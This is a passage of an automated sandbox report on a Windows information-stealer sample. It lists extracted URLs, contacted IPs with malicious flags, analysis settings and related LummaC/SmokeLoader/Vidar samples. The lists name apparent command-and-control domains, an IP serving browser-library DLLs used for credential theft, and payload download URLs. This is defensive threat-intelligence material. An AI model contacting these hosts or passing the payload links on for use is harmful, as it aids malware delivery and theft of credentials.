                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/apie21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://s.ytimg.com;katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://t.me/copterwinC9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/rkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://steam.tv/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/mozglue.dllaokatA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.mozilla.com/en-US/blocklist/katA304.tmp, katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/mkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mozilla.org0/katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://t.me/copterwinr0isMozilla/5.0katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://store.steampowered.com/privacy_agreement/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/HkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://store.steampowered.com/points/shop/katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jskatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/X21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl021AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59JKFIkatA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.rootca1.amazontrust.com0:21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://sketchfab.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://lv.queniujq.cnkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://outlook.comexplorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGIIDBG.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.youtube.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/privacy_agreement/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59akatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/#katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.clokatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/21AE.exe, 00000005.00000003.2357257185.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.000000000089C000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506059857.000000000089B000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2397590103.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.google.com/recaptcha/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://checkout.steampowered.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLGIIDBG.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refkatA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/mozglue.dllk~ckatA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59;katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/.katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/8katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://store.steampowered.com/;katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/about/76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/my/wishlist/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://word.office.comonexplorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/sqls.dllYVjkatA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headekatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  23.145.40.124
                  		unknownReserved
                  		22631SURFAIRWIRELESS-IN-01UStrue
                  188.114.97.3
                  		whispedwoodmoodsksl.shopEuropean Union
                  		13335CLOUDFLARENETUStrue
                  104.102.42.29
                  		steamcommunity.comUnited States
                  		16625AKAMAI-ASUStrue
                  187.143.58.5
                  		dbfhns.inMexico
                  		8151UninetSAdeCVMXtrue
                  185.235.137.54
                  		unknownIran (ISLAMIC Republic Of)
                  		202391AFRARASAIRfalse
                  65.109.242.59
                  		unknownUnited States
                  		11022ALABANZA-BALTUSfalse
                  186.112.12.192
                  		unknownColombia
                  		3816COLOMBIATELECOMUNICACIONESSAESPCOtrue
                  91.202.233.231
                  		unknownRussian Federation
                  		9009M247GBtrue
                  45.129.96.86
                  		unknownEstonia
                  		208440GMHOST-EEtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1447731
                  Start date and time:2024-05-27 00:26:04 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 12m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@15/35@4/9
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 45
                  • Number of non-executed functions: 264
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target katA304.tmp, PID 1436 because there are no executed function
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  00:27:13Task SchedulerRun new task: Firefox Default Browser Agent 261E3ADE99B8A132 path: C:\Users\user\AppData\Roaming\aarhevh
                  18:27:01API Interceptor375419x Sleep call for process: explorer.exe modified
                  18:27:24API Interceptor9x Sleep call for process: 21AE.exe modified
                  18:27:59API Interceptor1x Sleep call for process: WerFault.exe modified
                  18:28:04API Interceptor1x Sleep call for process: katA304.tmp modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  23.145.40.124QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124/pintxi1lv.exe
                  188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                  • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
                  http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
                  • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
                  http://twomancake.comGet hashmaliciousUnknownBrowse
                  • twomancake.com/
                  BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                  • fleur-de-lis.sbs/jhgfd
                  Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                  • qr-in.com/YXcuqXy
                  LHER000698175.xlsGet hashmaliciousUnknownBrowse
                  • qr-in.com/JeYCrvM
                  PO 4500025813.xlsGet hashmaliciousUnknownBrowse
                  • qr-in.com/RtWEZGi
                  SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                  • rocheholding.top/evie3/five/fre.php
                  WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
                  http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
                  • hjkie5.pages.dev/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  whispedwoodmoodsksl.shopQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.96.3
                  a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.21.77.72
                  2WG7HEj7mc.exeGet hashmaliciousLummaCBrowse
                  • 188.114.96.3
                  dbfhns.inQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 211.119.84.112
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 78.89.199.216
